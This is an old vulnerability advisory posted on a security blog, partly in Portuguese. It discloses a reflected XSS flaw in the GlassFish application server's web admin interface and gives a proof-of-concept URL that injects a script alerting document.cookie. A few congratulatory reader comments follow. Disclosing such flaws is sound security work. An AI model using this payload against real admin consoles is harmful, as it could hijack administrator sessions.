Home > websecurity > XSS – Glassfish Web Admin Interface (Sun Java System Application

XSS – Glassfish Web Admin Interface (Sun Java System Application

Bom senhores, essa e mais uma dentro de uma interface de adminsitracao. mais um problema de validacao de entradas🙂

Abracos!🙂

==============================

XSS – Glassfish Web Admin Interface (Sun Java System Application
Server 9.1_01 (build b09d-fcs) )

==============================

Author: Eduardo Neves a.k.a _eth0_
Date: 10 june 2008
Site: https://webappsecurity.wordpress.com

==============================

APPLICATION : Glassfish webadmin interface
VERSION : Sun Java System Application Server 9.1_01 (build b09d-fcs)
VENDOR : http://www.sun.com
DOWNLOAD : https://glassfish.dev.java.net/

==============================

IMPACT: XSS, XSRF, etc.

Severity: Low (or not?)

==============================

Descrition:

This vulnerability was found in Edit HTTP Listener section in
Glassfish web admin interface.

This is a vulnerable URL:

http://%5BHOSTNAME%5D:4848/configuration/httpListenerEdit.jsf?name=<script>a
lert(document.cookie);</script>&configName=server-config

Categories: websecurity
  1. ulissescastro
    June 11, 2008 at 3:41 am

    AAEAEAEA…… boa!! +1 duuuuu

  2. Rafael Larcher
    June 11, 2008 at 8:55 pm

    Você é o cara!!! kkk… Abração Eduardo!🙂

  3. Thiago
    June 14, 2008 at 9:17 pm

    Comentário do Larcher não vale. É o fã número um do Dudu.

    hehehehe

  1. No trackbacks yet.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

%d bloggers like this: